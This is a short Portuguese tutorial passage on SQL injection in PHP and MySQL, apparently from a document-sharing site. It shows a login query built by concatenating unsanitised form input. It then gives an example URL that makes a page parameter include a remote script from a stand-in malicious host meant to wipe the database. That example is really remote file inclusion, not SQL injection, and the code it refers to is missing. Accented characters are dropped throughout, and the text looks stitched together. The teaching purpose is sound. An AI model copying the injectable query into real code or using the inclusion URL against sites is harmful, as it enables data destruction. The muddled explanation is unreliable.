Escolar Documentos
Profissional Documentos
Cultura Documentos
Falaremos sobre um assunto muito importante, que envolve a segurana dos nossos
projetos em PHP e MySQL, o temido SQL Injection. Se voc programador com
certeza j ouviu respeito, mas se nunca entendeu ao certo vou explicar do que se trata.
O SQL Injection um ataque que visa enviar comandos nocivos base de dados atravs
de campos de formulrios ou atravs de URLs. Um ataque bem-sucedido pode, por
exemplo, apagar uma tabela do banco, deletar todos os dados da tabela ou at adquirir
senhas que estejam cadastradas.
$usuario = $_POST['usuario'];
$senha = $_POST['senha'];
$sql = "SELECT * FROM usuarios WHERE usuario = '".$usuario."' AND
senha = '".$senha."' ";
$processa = mysql_query($sql);
Com isso o invasor pode, por exemplo, colocar um caminho de um script externo no
lugar da varivel:
http://www.seusite.com.br/?pagina=http://malicioso.com/apaga-banco.php O seu site
incluiria o arquivo normalmente e executaria tudo que existe dentro dele e seu banco
poderia ser completamente zerado!